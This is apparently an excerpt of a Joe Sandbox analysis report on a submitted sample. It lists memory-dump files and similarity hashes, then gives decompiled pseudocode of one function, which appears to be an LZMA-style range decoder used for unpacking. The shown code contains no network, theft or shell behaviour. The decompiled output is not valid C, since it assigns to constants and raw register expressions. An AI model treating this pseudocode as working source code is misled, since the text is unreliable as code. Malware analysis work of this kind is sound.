                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                              • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                                                              • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                              • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 98%
                                                                                              			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
